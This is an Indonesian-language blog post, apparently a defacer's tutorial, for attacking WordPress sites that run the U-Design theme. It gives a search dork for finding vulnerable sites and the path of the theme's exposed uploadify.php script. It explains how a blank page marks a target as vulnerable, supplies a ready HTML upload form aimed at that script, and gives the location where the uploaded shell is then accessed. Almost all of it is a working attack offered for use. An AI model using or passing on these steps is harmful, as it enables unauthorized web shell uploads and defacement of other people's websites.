Defece Menggunakan Wordpress Themes U-DESIGN Exploit
#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress
Dork: inurl:themes/u-design/ < kembangin
Exploit: /wp-content/themes/u-design/scripts/admin/uploadify/
uploadify.php
Kalau target vuln , maka tampilannya blank ( putih semua )pas di exploit
Simpan CSRF dengan Ext .html ( x.html )
<form method="POST" action="http://www.site.com/wp-content/themes/u-design/scripts/admin/uploadify/
uploadify.php"
enctype="multipart/form-data"><input type="file" name="Filedata" /><button>Upload</button><br />
</form>
Akses Shell : site.com/myshell.php
Post a Comment